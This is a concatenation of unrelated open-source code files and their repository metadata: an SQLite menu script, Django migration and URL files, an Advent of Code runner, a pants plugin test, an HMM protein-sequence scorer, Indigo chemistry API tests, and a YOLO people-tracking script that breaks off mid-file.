# The user will select a choice from the menu to interact with the database.
while True:
    print("\n Menu:")
    print("****************************************")
    print(" 1. Create table EmployeeUoB")
    print(" 2. Insert data into EmployeeUoB")
    print(" 3. Select all data into EmployeeUoB")
    print(" 4. Search an employee")
    print(" 5. Update data some records")
    print(" 6. Delete data some records")
    print(" 7. Drop table Employee")
    print(" 8. Exit\n")
    # NOTE: int() raises (and ends the loop with a traceback) on non-numeric
    # input; only choices 1-8 are handled below.
    __choose_menu = int(input("Enter your choice: "))
    # NOTE(review): a fresh DBOperations (and hence a throwaway connection)
    # is built on every iteration; a single instance would suffice.
    db_ops = DBOperations()
    if __choose_menu == 1:
        db_ops.create_table()
    elif __choose_menu == 2:
        db_ops.insert_data()
    elif __choose_menu == 3:
        db_ops.select_all()
    elif __choose_menu == 4:
        db_ops.search_data()
    elif __choose_menu == 5:
        db_ops.update_data()
    elif __choose_menu == 6:
        db_ops.delete_data()
    elif __choose_menu == 7:
        db_ops.drop_table()
    elif __choose_menu == 8:
        exit(0)
    else:
        print("Invalid Choice")
| SvetA95/DatabasesAndCloud_Assignment3 | lab3.py | lab3.py | py | 9,339 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sqlite3.connect",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "sqlite3.connect",
"line_number": 51,
"usage_type": "call"
},
{
"api_name": "pandas.read_sql_query",
"line_number": 102,
"usage_type": "call"
}
] |
38941944677 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import datetime
from django.utils.timezone import utc
class Migration(migrations.Migration):
    """Auto-generated schema migration for shifts_app.

    Removes the Shift->ShiftGroup relation and the ShiftGroup model, and
    rewrites the datetime defaults on Shift.
    """

    dependencies = [
        ('shifts_app', '0010_auto_20171130_2233'),
    ]

    operations = [
        # Drop the FK field before the model it points to can be deleted.
        migrations.RemoveField(
            model_name='shift',
            name='shiftGroup',
        ),
        migrations.AlterField(
            model_name='shift',
            name='end_datetime',
            # NOTE: the default is the wall-clock moment makemigrations ran
            # (a fixed value), not a dynamic "now".
            field=models.DateTimeField(default=datetime.datetime(2017, 12, 1, 22, 40, 31, 52072, tzinfo=utc)),
        ),
        migrations.AlterField(
            model_name='shift',
            name='start_datetime',
            field=models.DateTimeField(default=datetime.datetime(2017, 12, 1, 22, 40, 31, 52011, tzinfo=utc)),
        ),
        migrations.DeleteModel(
            name='ShiftGroup',
        ),
    ]
| ssrahman34/Employee-Shifts-Project | shift_project/shifts_app/migrations/0011_auto_20171201_2240.py | 0011_auto_20171201_2240.py | py | 924 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.db.migrations.Migration",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "django.db.migrations",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "django.db.migrations.RemoveField",
"line_number": 16,
"usage_type": "call"
},
... |
21695020276 | """mtgrecorder URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
urlpatterns = [
    # App and admin routes.
    url(r'^tournamentHost/', include('tournamentHost.urls')),
    url(r'^admin/', admin.site.urls),
    # Auth-related URLs:
    # NOTE(review): the dotted-string view references below were deprecated in
    # Django 1.8 and removed in 1.10, so this URLconf requires Django < 1.10.
    # Import the view callables to modernise.
    url(r'^login/$', 'django.contrib.auth.views.login', name='login'),
    url(r'^logout/$', 'django.contrib.auth.views.logout', name='logout'),
    #url(r'^loggedin/$', 'mtgrecorder.views.loggedin', name='loggedin'),
    # Registration URLs
    url(r'^register/$', 'mtgrecorder.views.register', name='register'),
    url(r'^register/complete/$', 'mtgrecorder.views.registration_complete', name='registration_complete'),
    url(r'^welcome/', 'mtgrecorder.views.welcome', name='welcome'),
    url(r'^request/', 'mtgrecorder.views.request_verification', name='request_verification'),
    url(r'^tournament/add/', 'mtgrecorder.views.add_tournament', name='add_tournament'),
    #url(r'^verify_request/', 'mtgrecorder.views.verify_request', name='verify_request'),
    # Positional capture group: the username (letters, digits, dot, _, -).
    url(r'^profile/([A-Za-z0-9\.\_\-]+)', 'mtgrecorder.views.profile', name='profile'),
    #url(r'', 'mtgrecorder.views.welcome', name='welcome'),
    # Positional capture group: the numeric match id.
    url(r'^match/(\d+)$', 'mtgrecorder.views.confirm_match', name='confirm_match'),
    # Below should be all confirmed match results...
    #url(r'^answer/$', 'app.views.xxx_test1', name='newAnswer '),
]
| edasaur/mtg-recorder | mtgrecorder/urls.py | urls.py | py | 1,981 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.conf.urls.url",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "django.conf.urls.include",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "django.conf.urls.url",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "dj... |
74788588584 | import itertools
from day07.day7_lib import calc_amp, calc_amp_with_feedback
from util import get_program
if __name__ == "__main__":
    program = get_program("inputs/day7.txt")

    # Part 1: phase settings 0-4, one pass through the amplifier chain.
    best = max(
        (calc_amp(program, phases), phases)
        for phases in itertools.permutations(range(5))
    )
    print(f"The maximal amplitude that 5 amps can give is: {best[0]}")  # 77500

    # Part 2: phase settings 5-9, amplifiers wired in a feedback loop.
    best = max(
        (calc_amp_with_feedback(program, phases), phases)
        for phases in itertools.permutations(range(5, 10))
    )
    print(f"With feedback the max becomes {best[0]}")  # 22476942
| el-hult/adventofcode2019 | day07/day7_runner.py | day7_runner.py | py | 797 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "util.get_program",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "itertools.permutations",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "day07.day7_lib.calc_amp",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "day07.d... |
18953334688 | import numpy as np
from collections import Counter
import pandas as pd
from math import log10
import matplotlib.pyplot as plt
from HMM_errors import *
class SequenceReader:
    """
    This class builds HMM from protein or DNA sequence alignment.

    Reading an alignment file produces:
      * ``match_emission`` / ``insert_emission`` -- per-position emission
        probability tables (DataFrames indexed by residue letter),
      * ``trans`` -- nested dict trans[src][dst][k] of transition
        probabilities between the Match/Insert/Delete states,
      * ``true_seq`` -- indices of alignment columns treated as match states.
    """

    def __init__(self, path_to_file, amino_acids=True, deletion_sign="-"):
        # Load the alignment: one aligned sequence per line, split into chars.
        alignment_list = []
        with open(path_to_file) as seq_file:
            for line in seq_file:
                alignment_list.append(list(line.strip()))
        if not alignment_list:
            raise EmptyFile("File {} is empty!".format(path_to_file))
        self.alignment_list = alignment_list
        self.alignment_len = len(alignment_list)    # number of sequences
        # Column-wise view of the alignment (one list per column).
        self.position_list = SequenceReader.transpose(alignment_list)
        self.position_len = len(self.position_list)  # alignment width
        self.deletion_sign = deletion_sign
        # Emission alphabet: 20 amino acids or 4 nucleotides.
        self.alignment_alphabet = (
            "A", "R", "N", "D", "C", "E", "Q", "G", "H", "I", "L", "K", "M", "F", "P", "S", "T", "W", "Y",
            "V") if amino_acids else ("A", "C", "G", "T")
        self.amino_acids = amino_acids
        self.true_seq, self.match_emission, self.insert_emission = self.calculate_emissions()
        # Store emissions as letter-indexed DataFrames (columns = positions).
        self.match_emission = pd.DataFrame(SequenceReader.transpose(self.match_emission))
        self.match_emission.index = self.alignment_alphabet
        self.insert_emission = pd.DataFrame(SequenceReader.transpose(self.insert_emission))
        self.insert_emission.index = self.alignment_alphabet
        self.L = len(self.true_seq)  # model length = number of match states
        self.trans = self.calculate_transitions()

    def calculate_transitions(self):
        """Count state transitions over all sequences and return them
        normalised to probabilities (see divide_dict for the smoothing)."""
        match_transition = {"M": [0] * (self.L + 1), "D": [0] * (self.L + 1), "I": [0] * (self.L + 1)}
        insert_transition = {"M": [0] * (self.L + 1), "D": [0] * (self.L + 1), "I": [0] * (self.L + 1)}
        # delete_transition = {"M": [float('nan')] + ([0] * self.L), "D": [float('nan')] + ([0] * self.L),
        #                      "I": [float('nan')] + ([0] * self.L)}
        delete_transition = {"M": [float(0)] + ([0] * self.L), "D": [float(0)] + ([0] * self.L),
                             "I": [float(0)] + ([0] * self.L)}
        # trans[src][dst][k] = count of src->dst transitions at model position k.
        trans = {"M": match_transition, "D": delete_transition, "I": insert_transition}
        for alignment_i, sequence in enumerate(self.alignment_list):
            last_seq_position = 0
            first_transition_index = "M"
            for true_seq_i, x in enumerate(self.true_seq):
                self.process_transitions(sequence, trans, last_seq_position, x, true_seq_i, first_transition_index)
                # State at this match column: D when the residue is deleted.
                first_transition_index = "D" if sequence[x] == self.deletion_sign else "M"
                last_seq_position = x + 1
            else:
                # After the final match column, account for a trailing insert
                # run between the last match state and the sequence end.
                if last_seq_position != 0:
                    true_seq_i += 1
                    self.process_transitions(sequence, trans, last_seq_position, len(sequence), true_seq_i,
                                             first_transition_index)
        return SequenceReader.divide_dict(trans)

    def process_insertion(self, insertion, insert_transition, sequence_sign, true_seq_i):
        """Record the transitions caused by one insertion run and return the
        state the next recorded transition ends in ("I" if a run occurred)."""
        last_transition_index = "D" if sequence_sign == self.deletion_sign else "M"
        if insertion:
            # n inserted residues contribute n-1 self-loops I->I ...
            insert_transition["I"][true_seq_i] += len(insertion) - 1
            # ... plus one exit transition I->M or I->D.
            insert_transition[last_transition_index][true_seq_i] += 1
            last_transition_index = "I"
        return last_transition_index

    def process_transitions(self, sequence, trans, last_seq_position, x, true_seq_i, first_transition_index):
        """Count the transitions between two consecutive match columns:
        previous state -> (optional insert run) -> state at column *x*."""
        # Residues between the previous match column and this one = insertion.
        insertion = SequenceReader.clear_list(sequence[last_seq_position:x])
        # Sign at the target column; True past the end (trailing-insert call).
        sign_in_sequence = sequence[x] if x < len(sequence) else True
        last_transition_index = self.process_insertion(insertion, trans["I"], sign_in_sequence, true_seq_i)
        trans[first_transition_index][last_transition_index][true_seq_i] += 1

    def calculate_emissions(self, deletion_sign="-", treshold=0.5):
        """Classify alignment columns as match/insert states and compute
        per-position emission probabilities (normalised by divide_list).

        A column is a match state when fewer than *treshold* of its rows
        are deletions; consecutive insert columns are pooled together.
        """
        true_seq = []
        match_emission = []
        insert_emission = []
        full_occurrence_count = {}  # pooled counts of the current insert run
        for i, position_i in enumerate(self.position_list):
            current_occurrence_count = Counter(position_i)  # UPDATE HERE!
            deletion_count = current_occurrence_count.get(deletion_sign, 0)
            if deletion_count / self.alignment_len < treshold:
                match_emission.append(SequenceReader.divide_list(self.build_count_column(current_occurrence_count)))
                insert_emission.append(SequenceReader.divide_list(self.build_count_column(full_occurrence_count)))
                true_seq.append(i)
                full_occurrence_count = {}
            else:
                # Insert column: pool its counts into the running insert run.
                full_occurrence_count = Counter(full_occurrence_count) + Counter(current_occurrence_count)
        else:
            # Trailing insert columns after the last match state.
            insert_emission.append(SequenceReader.divide_list(self.build_count_column(full_occurrence_count)))
            # match_emission.insert(0,[float("NaN")]*len(self.alignment_alphabet))
            # Dummy column 0 so match state k lives at index k (1-based model).
            match_emission.insert(0, [float(0)] * len(self.alignment_alphabet))
        return true_seq, match_emission, insert_emission

    def build_count_column(self, occurrence_count):
        """Return the raw count for every alphabet letter (0 when absent)."""
        match_column = []
        for letter in self.alignment_alphabet:
            match_column.append(occurrence_count.get(letter, 0))
        return match_column

    def forward(self, sequence):
        """Forward-algorithm score of *sequence* against this model.

        Emissions are divided by the uniform background 1/|alphabet|
        (log-odds scoring).  Returns the final log match cell FM[len][L].
        """
        FM = np.zeros(shape=(len(sequence) + 1, self.L + 1), dtype=np.float64)
        FI = np.zeros(shape=(len(sequence) + 1, self.L + 1), dtype=np.float64)
        FD = np.zeros(shape=(len(sequence) + 1, self.L + 1), dtype=np.float64)
        # row_len = seqeunce len = i
        # column_len = model len = j
        FI[0, 0] = np.log(self.insert_emission.loc[sequence[0]][0])
        # FM[1, 1] = np.log(self.match_emission.loc[sequence[1]][1]) + np.log(
        #     self.trans["M"]["M"][0] * np.exp(FM[0, 0]) + self.trans["I"]["M"][0] * np.exp(FI[0, 0])
        # )
        #
        # FI[1, 1] = np.log(self.insert_emission.loc[sequence[1]][1]) + np.log(
        #     self.trans["M"]["I"][0] * np.exp(FM[0, 1]) + self.trans["I"]["I"][0] * np.exp(FI[0, 1])
        # )
        #
        # FD[1, 1] = np.log(self.trans["M"]["D"][0] * np.exp(FM[1, 0]) + self.trans["I"]["D"][0] * np.exp(FI[1, 0]))
        # NOTE(review): cells left at their zero initialisation correspond to
        # probability exp(0) = 1, not 0 -- confirm the boundary conditions.
        for i, sign in enumerate(sequence):
            i += 1  # matrices are 1-based in both dimensions
            for j in range(1, self.L + 1):
                FM[i, j] = np.log(self.match_emission.loc[sign][j] / (1 / len(self.alignment_alphabet))) + np.log(
                    (self.trans["M"]["M"][j - 1] * np.exp(FM[i - 1][j - 1])) +
                    (self.trans["I"]["M"][j - 1] * np.exp(FI[i - 1][j - 1])) +
                    (self.trans["D"]["M"][j - 1] * np.exp(FD[i - 1][j - 1]))
                )
                FI[i, j] = np.log(self.insert_emission.loc[sign][j] / (1 / len(self.alignment_alphabet))) + np.log(
                    (self.trans["M"]["I"][j - 1] * np.exp(FM[i - 1][j])) +
                    (self.trans["I"]["I"][j - 1] * np.exp(FI[i - 1][j])) +
                    (self.trans["D"]["I"][j - 1] * np.exp(FD[i - 1][j]))
                )
                FD[i, j] = np.log(
                    (self.trans["M"]["D"][j - 1] * np.exp(FM[i][j - 1])) +
                    (self.trans["I"]["D"][j - 1] * np.exp(FI[i][j - 1])) +
                    (self.trans["D"]["D"][j - 1] * np.exp(FD[i][j - 1]))
                )
        # Relies on the loop variables: the last computed match cell.
        return FM[i][j]

    @staticmethod
    def compare(sequence, HMM_model_1, HMM_model_2=False):
        """Log10 ratio of the two models' forward scores for *sequence*.

        NOTE(review): ``random_model`` is not defined anywhere in this module,
        so calling compare without HMM_model_2 will fail.  Also forward()
        already returns a log score, so log10 of the ratio of two log scores
        may not be the intended log-odds -- confirm.
        """
        if not HMM_model_2:
            HMM_model_2 = SequenceReader.random_model(HMM_model_1.position_len, HMM_model_1.alignment_len,
                                                      HMM_model_1.amino_acids, HMM_model_1.deletion_sign)
        return log10(HMM_model_1.forward(sequence) / HMM_model_2.forward(sequence))

    @staticmethod
    def pairwise(iterable):
        "s -> (s0,s1), (s1,s2), (s2, s3), ..."
        from itertools import tee
        a, b = tee(iterable)
        next(b, None)
        return zip(a, b)

    @staticmethod
    def transpose(iterable):
        """Transpose a list of rows into a list of columns."""
        return list(map(list, zip(*iterable)))

    @staticmethod
    def clear_list(list_to_clear, element_to_delete="-"):
        """Drop every occurrence of *element_to_delete* from the list."""
        return [x for x in list_to_clear if x != element_to_delete]

    @staticmethod
    def divide_list(list_to_divide):
        """Normalise counts to probabilities with add-one smoothing."""
        list_to_divide = [x + 1 for x in list_to_divide]
        list_sum = sum(list_to_divide)
        return [x / list_sum for x in list_to_divide]

    @staticmethod
    def divide_dict(dict_to_divide):
        """Normalise transition counts per source state/position with
        add-one smoothing over the three destination states."""
        for first, second in dict_to_divide.items():
            # Denominator per position: total outgoing count + 1 per destination.
            fraction = [sum(x) + 1 * 3 for x in zip(*second.values())]
            for key_of_list, list_to_divide in second.items():
                list_to_divide = [(x + 1) / y for x, y in zip(list_to_divide, fraction)]
                dict_to_divide[first][key_of_list] = list_to_divide
        return dict_to_divide
return dict_to_divide
def plot_matrix(title, data):
    """Scatter-plot *data*, save it under plots/<title>.png, then show it.

    The title labels the on-screen figure and (with spaces replaced by
    underscores) names the saved file.
    """
    import os  # local import: keeps the module's import section untouched

    fig = plt.figure(figsize=(10, 6))
    plt.plot(data, linestyle="", marker="o")
    plt.title(title)
    # Ensure the output directory exists; savefig raises otherwise.
    # (Also dropped the redundant plt.gcf() -- `fig` already is the
    # current figure.)
    os.makedirs('plots', exist_ok=True)
    fig.savefig('plots/{}.png'.format(title.replace(" ", "_")))
    plt.show()
def plot_model(model, name, position):
    """Print summary info for one HMM model and plot its emissions and transitions at *position*."""
    print("{} model len: {}".format(name, model.L))
    print("{} T, mE, iE shapes: {},{},{}".format(name, (9, len(model.trans["M"]["M"])),
                                                 model.match_emission.shape,
                                                 model.insert_emission.shape))
    print("----------Position {} of {} HMM model.------------".format(position, name))
    plot_matrix("Position {} of {} HMM model: Match emission".format(position, name),
                model.match_emission.loc[:, position])
    plot_matrix("Position {} of {} HMM model: Insert emission".format(position, name),
                model.insert_emission.loc[:, position])
    # Collect one transition probability per state pair.
    # NOTE(review): index 50 is hard-coded here even though the plot title
    # reports *position* -- confirm whether this should be y2[position].
    trans_table = []
    trans_names = []
    for src_state, targets in model.trans.items():
        for dst_state, probabilities in targets.items():
            print("{}-{}: {}".format(src_state, dst_state, probabilities[50]))
            trans_table.append([probabilities[50]])
            trans_names.append("{}-{}".format(src_state, dst_state))
    trans_df = pd.DataFrame(trans_table, index=trans_names)
    print(trans_df)
    plot_matrix("Position {} of {} HMM model: Transitions".format(position, name), trans_df)
def main():
    # Train one profile HMM per protein family from its alignment file.
    atp = SequenceReader("ATPases.txt")
    gtp = SequenceReader("GTP_binding_proteins.txt")
    # Visualise two alignment positions of each trained model.
    for position in [49, 50]:
        for model, name in [(atp, "ATPases"), (gtp, "GTP binding proteins")]:
            plot_model(model, name, position)
    y = []
    # Score every unclassified sequence under both models; keep the
    # difference (positive favours ATPases, negative favours GTP binders).
    with open("Unclassified_proteins.txt") as file:
        for line in file:
            atp_score = atp.forward(line.strip())
            gtp_score = gtp.forward(line.strip())
            print()
            print(line.strip())
            print("ATP score: {}".format(atp_score))
            print("GTP score: {}".format(gtp_score))
            y.append(atp_score - gtp_score)
    # First figure: raw score differences per sequence.
    fig = plt.figure(figsize=(10, 6))
    y_plus = [x if x >= 0 else 0 for x in y]
    y_minus = [x if x < 0 else 0 for x in y]
    x = [x for x in range(len(y))]
    plt.bar(x, y, tick_label=x, width=0.5)
    # Second figure: the same differences split into the two families.
    fig = plt.figure(figsize=(10, 6))
    ax = fig.add_subplot(111)
    ax.bar(x, y_minus, tick_label=x, width=0.5, color='r', label='GTP binding proteins')
    ax.bar(x, y_plus, tick_label=x, width=0.5, color='b', label='ATPases')
    plt.title('Family membership')
    ax.legend()
    plt.show()
# Run the full analysis only when executed as a script.
if __name__ == "__main__":
    main()
| Kronossos/SAD2_project_2 | SequenceReader.py | SequenceReader.py | py | 11,452 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pandas.DataFrame",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "collections.Counter",
"line_number": 101,
"usage_type": "call"
},
{
"api_name": "collections.Co... |
17797113504 | from __future__ import absolute_import, division, print_function, unicode_literals
import os
from pants.base.build_environment import get_buildroot
from pants_test.backend.python.pants_requirement_integration_test_base import \
PantsRequirementIntegrationTestBase
class PantsRequirementIntegrationTest(PantsRequirementIntegrationTestBase):
    """A pants plugin should be able to depend on a pants_requirement() alone to
    declare its dependencies on pants modules. This plugin, when added to the
    pythonpath and backend_packages, should be able to declare new BUILD file
    objects."""

    @classmethod
    def use_pantsd_env_var(cls):
        """The test fails to run under pantsd because of a failure to initialize a subsystem"""
        return False

    def run_with_testproject_backend_pkgs(self, cmd):
        # Point pants at the in-repo test plugin and its pants_requirement targets
        # before running the requested command.
        plugin_src_dir = os.path.join(
            get_buildroot(), 'testprojects/pants-plugins/src/python')
        plugin_pkg_name = 'test_pants_plugin'
        pants_req_addr = 'testprojects/pants-plugins/3rdparty/python/pants'
        pants_test_infra_addr = 'tests/python/pants_test:test_infra'
        pre_cmd_args = [
            "--pythonpath=+['{}']".format(plugin_src_dir),
            "--backend-packages=+['{}']".format(plugin_pkg_name),
            "--pants-test-infra-pants-requirement-target={}".format(pants_req_addr),
            "--pants-test-infra-pants-test-infra-target={}".format(pants_test_infra_addr),
        ]
        return self.run_pants(command=pre_cmd_args + cmd)

    def test_pants_requirement(self):
        self.maxDiff = None
        with self.create_unstable_pants_distribution() as repo:
            tests_dir = 'testprojects/pants-plugins/tests/python/test_pants_plugin'
            # Activate the plugin's BUILD file only for the duration of the run.
            with self.file_renamed(os.path.join(get_buildroot(), tests_dir), 'TEST_BUILD', 'BUILD'):
                test_pants_requirement_cmd = ['--python-repos-repos={}'.format(repo),
                                              'test',
                                              tests_dir]
                pants_run = self.run_with_testproject_backend_pkgs(test_pants_requirement_cmd)
                self.assert_success(pants_run)
| fakeNetflix/twitter-repo-pants | tests/python/pants_test/backend/python/test_pants_requirement_integration.py | test_pants_requirement_integration.py | py | 2,104 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pants_test.backend.python.pants_requirement_integration_test_base.PantsRequirementIntegrationTestBase",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "os.path.join",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 2... |
28370505452 | import itertools
import os
import pathlib
from typing import List
import pytest
from fastapi.testclient import TestClient
from indigo_service import jsonapi
from indigo_service.indigo_http import app
# Shared in-process HTTP client for exercising the Indigo service endpoints.
client = TestClient(app)

# Sample inputs in SMILES and InChI notation; "auto" asks the service to
# detect the input format itself.
test_structures = [
    {"structure": "CNC", "format": "auto"},
    {"structure": "CN1C=NC2=C1C(=O)N(C(=O)N2C)C", "format": "auto"},
    {
        "structure": "InChI=1S/C8H10N4O2/c1-10-4-9-6-5(10)"
        "7(13)12(3)8(14)11(6)2/h4H,1-3H3",
        "format": "auto",
    },
]
# Convert
@pytest.mark.parametrize(
    "test_input,target,modifiers,expected",
    [
        (["CNC", "inchi", [], "InChI=1S/C2H7N/c1-3-2/h3H,1-2H3"]),
        (["InChI=1S/C2H7N/c1-3-2/h3H,1-2H3", "smiles", [], "CNC"]),
        (
            [
                "InChI=1S/C8Cl2N2O2/c9-5-6(10)8(14)4(2-12)3(1-11)7(5)13",
                "inchi",
                ["aromatize", "clean2d"],
                "InChI=1S/C8Cl2N2O2/c9-5-6(10)8(14)4(2-12)3(1-11)7(5)13",
            ]
        ),
        (["C1=CC=CC=C1", "smiles", ["aromatize"], "c1ccccc1"]),
    ],
)
def test_convert(
    test_input: str, target: str, modifiers: List[str], expected: str
) -> None:
    """POST /indigo/convert must translate a structure into the target format."""
    payload = {
        "data": {
            "type": "convert",
            "attributes": {
                "compound": {
                    "structure": test_input,
                    "format": "auto",
                    "modifiers": modifiers,
                },
                "outputFormat": target,
            },
        }
    }
    response = client.post("/indigo/convert", json=payload)
    assert response.status_code == 200
    attributes = response.json()["data"]["attributes"]
    assert attributes["structure"] == expected
    assert attributes["format"] == target
def test_ket_convert() -> None:
    """Convert every structure named by a ket fixture file into ket format.

    Each file under the resources directory is named ``<smiles>.<ext>``; the
    SMILES stem is posted to /indigo/convert and the call must succeed.
    """
    resources = "tests/test_resources/kets"
    *_, files = next(os.walk(resources))
    for file_ in files:
        # The structure to convert is encoded in the file name itself; the
        # original code opened the file without ever reading it, so the
        # pointless open (and its pylint suppression) has been dropped.
        smiles = pathlib.Path(file_).stem
        response = client.post(
            "/indigo/convert",
            json={
                "data": {
                    "type": "convert",
                    "attributes": {
                        "compound": {
                            "structure": smiles,
                            "format": "auto",
                            "modifiers": [],
                        },
                        "outputFormat": "ket",
                    },
                }
            },
        )
        assert response.status_code == 200
# Similarities
def similarity_request(  # pylint: disable=too-many-arguments
    source: dict,
    targets: list[dict],
    fingerprint: str = "sim",
    metric: str = "tanimoto",
    alpha: float = 0.5,
    beta: float = 0.5,
) -> dict:
    """Build a JSON:API request payload for the /indigo/similarities endpoint."""
    attributes = {
        "source": source,
        "targets": targets,
        "fingerprint": fingerprint,
        "metric": metric,
        "alpha": alpha,
        "beta": beta,
    }
    return {"data": {"type": "similarities", "attributes": attributes}}
def test_similarities_error():
    """An unparsable target structure must yield a 400 with exactly one error."""
    for structure in test_structures:
        response = client.post(
            "/indigo/similarities",
            json=similarity_request(
                source=structure,
                # "D" is not a valid structure in any supported notation.
                targets=[{"structure": "D", "format": "auto"}],
            ),
        )
        errors = response.json().get("errors")
        assert isinstance(errors, list)
        assert response.status_code == 400
        assert len(errors) == 1
# Descriptors
def descriptors_request(compound: dict, descriptors: tuple) -> dict:
    """Build a JSON:API request payload for the /indigo/descriptors endpoint."""
    attributes = {"compound": compound, "descriptors": descriptors}
    return {"data": {"type": "descriptor", "attributes": attributes}}
# Descriptors that only apply to reactions, not to single molecules.
react_descriptors = [
    jsonapi.Descriptors.COUNT_CATALYSTS,
    jsonapi.Descriptors.COUNT_MOLECULES,
    jsonapi.Descriptors.COUNT_PRODUCTS,
]
# Every remaining descriptor is treated as molecule-applicable below.
mol_descriptors = list(
    filter(lambda x: x not in react_descriptors, jsonapi.Descriptors)
)
def test_base_descriptors() -> None:
    """Request a sample of descriptor combinations for every test structure."""
    # Exhausting every 4-permutation would be enormous; the original code
    # broke out after 10 iterations, which islice expresses directly.
    sampled = itertools.islice(itertools.permutations(mol_descriptors, 4), 10)
    for descriptors in sampled:
        for compound in test_structures:
            payload = descriptors_request(compound=compound, descriptors=descriptors)
            response = client.post("/indigo/descriptors", json=payload)
            assert response.status_code == 200
| karen-sarkisyan/Indigo | api/http/tests/test_indigo_http.py | test_indigo_http.py | py | 4,788 | python | en | code | null | github-code | 36 | [
{
"api_name": "fastapi.testclient.TestClient",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "indigo_service.indigo_http.app",
"line_number": 13,
"usage_type": "argument"
},
{
"api_name": "typing.List",
"line_number": 46,
"usage_type": "name"
},
{
"api_... |
3656577055 | import os
from ultralytics import YOLO
import cv2
from tracker import Tracker
import numpy as np
# Open the demo clip and set up the detector + tracker pipeline.
videoDir = os.path.\
    join('.','data','people.mp4')
cap = cv2.VideoCapture(videoDir)
tracker = Tracker()
ret, frame = cap.read()
# uses deep sort
model = YOLO("yolov8n.pt")
num_1 = 0  # NOTE(review): never used below
num_2 = 0  # NOTE(review): never used below
# variables to be used
prev_centroids = []  # y-positions recorded on the previous frame, indexed by track order
centroids = []  # NOTE(review): appended to every frame but never cleared -- confirm intended
totalTime = []  # per-track count of consecutive "stationary" frames
prevTime = []  # NOTE(review): aliased to totalTime on the first frame (same list object)
i2 = 0  # processed-frame counter
time = 0
# loops through the frames
while ret:
    results = model(frame)
    # checks one frame at a time
    for result in results:
        detections = []
        # Unpack each YOLO detection into integer box coordinates + score.
        for r in result.boxes.data.tolist():
            x1, y1, x2, y2, score, class_id = r
            x1 = int(x1)
            y1 = int(y1)
            x2 = int(x2)
            y2 = int(y2)
            class_id = int(class_id)
            detections.append([x1, y1, x2, y2, score])
        # algorithm to detect people
        tracker.update(frame, detections)
        threshold = 75  # NOTE(review): unused
        i = 0
        # adds bounding box to people
        for track in tracker.tracks:
            bbox = track.bbox
            x1, y1, x2, y2 = bbox
            track_id = track.track_id
            # Only the box's top edge (y1) is used as the "centroid" for motion checks.
            centroid_x = (int(y1))
            centroids.append(centroid_x)
            totalTime.append(0)
            # checks if the y values can be compared
            if prev_centroids :
                dx = centroid_x - prev_centroids[i]
                # checks if the yval is in the same range as it started
                # as long as the val is in the same area then it must not be moving that fast or at all
                if (-55 <= dx <= 55):
                    cv2.rectangle(frame, (int(x1), int(y1)), (int(x2), int(y2)), (0, 0, 100), 3)
                    prevTime[i] += 1
                    time = prevTime[i]
                    # assigns stars to sus persons -- more stationary frames, more stars,
                    # and a progressively brighter red box.
                    if(5 >= time > 1):
                        cv2.putText(frame, '*', (int(x1), int(y1)), cv2.FONT_HERSHEY_SIMPLEX, .27, (0, 0, 0), 8)
                        cv2.putText(frame, '*', (int(x1), int(y1)), cv2.FONT_HERSHEY_SIMPLEX, .27, (255, 255, 255), 2)
                        cv2.rectangle(frame, (int(x1), int(y1)), (int(x2), int(y2)), (0, 0, 125), 3)
                    elif (8 >= time > 5):
                        cv2.putText(frame, '**', (int(x1), int(y1)), cv2.FONT_HERSHEY_SIMPLEX, .27, (0, 0, 0), 8)
                        cv2.putText(frame, '**', (int(x1), int(y1)), cv2.FONT_HERSHEY_SIMPLEX, .27, (255, 255, 255), 2)
                        cv2.rectangle(frame, (int(x1), int(y1)), (int(x2), int(y2)), (0, 0, 150), 3)
                    elif (12 >= time > 8):
                        cv2.putText(frame, '***', (int(x1), int(y1)), cv2.FONT_HERSHEY_SIMPLEX, .27, (0, 0, 0), 8)
                        cv2.putText(frame, '***', (int(x1), int(y1)), cv2.FONT_HERSHEY_SIMPLEX, .27, (255, 255, 255), 2)
                        cv2.rectangle(frame, (int(x1), int(y1)), (int(x2), int(y2)), (0, 0, 175), 3)
                    elif (15 >= time > 12):
                        cv2.putText(frame, '****', (int(x1), int(y1)), cv2.FONT_HERSHEY_SIMPLEX, .27, (0, 0, 0), 8)
                        cv2.putText(frame, '****', (int(x1), int(y1)), cv2.FONT_HERSHEY_SIMPLEX, .27, (255, 255, 255), 2)
                        cv2.rectangle(frame, (int(x1), int(y1)), (int(x2), int(y2)), (0, 0, 200), 3)
                    elif (time > 15):
                        cv2.putText(frame, '*****', (int(x1), int(y1)), cv2.FONT_HERSHEY_SIMPLEX, .27, (0, 0, 0), 8)
                        cv2.putText(frame, '*****', (int(x1), int(y1)), cv2.FONT_HERSHEY_SIMPLEX, .27, (255, 255, 255), 2)
                        cv2.rectangle(frame, (int(x1), int(y1)), (int(x2), int(y2)), (0, 0, 250), 3)
                        # NOTE(review): the next two draws overwrite the box just
